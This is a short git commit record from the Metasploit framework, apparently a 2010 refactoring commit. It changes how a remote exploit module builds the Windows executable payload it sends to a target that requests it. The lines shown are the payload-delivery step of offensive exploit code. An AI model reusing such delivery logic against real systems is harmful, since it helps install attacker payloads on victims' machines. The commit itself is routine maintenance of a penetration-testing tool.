actually use Msf::Exploit::EXE

git-svn-id: file:///home/svn/framework3/trunk@9896 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-07-21 00:02:04 +00:00
parent 276a83d7b4
commit dd7a8178d7
1 changed files with 1 additions and 2 deletions

View File

@ -117,8 +117,7 @@ class Metasploit3 < Msf::Exploit::Remote
if (Regexp.new(Regexp.escape(@payload)+'$', true).match(request.uri))
print_status "Sending payload executable to target ..."
return if ((p = regenerate_payload(cli)) == nil)
data = Msf::Util::EXE.to_win32pe(framework, p.encoded)
data = generate_exe({ :code => p.encoded })
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
return